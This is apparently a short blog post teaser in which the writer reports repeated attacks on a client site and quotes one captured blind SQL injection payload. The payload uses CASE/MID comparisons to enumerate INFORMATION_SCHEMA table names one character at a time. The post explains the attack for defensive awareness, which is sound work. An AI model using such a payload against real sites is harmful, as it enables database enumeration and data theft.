
Another malware exfil attempt
So a client site was under an attack. There were many many attempts to inject SQL like the following into an innocuous statement: (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(table_name AS NCHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x616f6b6865616c7468 LIMIT 42,1),23,1))>114) THEN 1 ELSE (SELECT 3246 UNION SELECT 9107) END)) In essence it’s for stepping through tables of a target…
Read more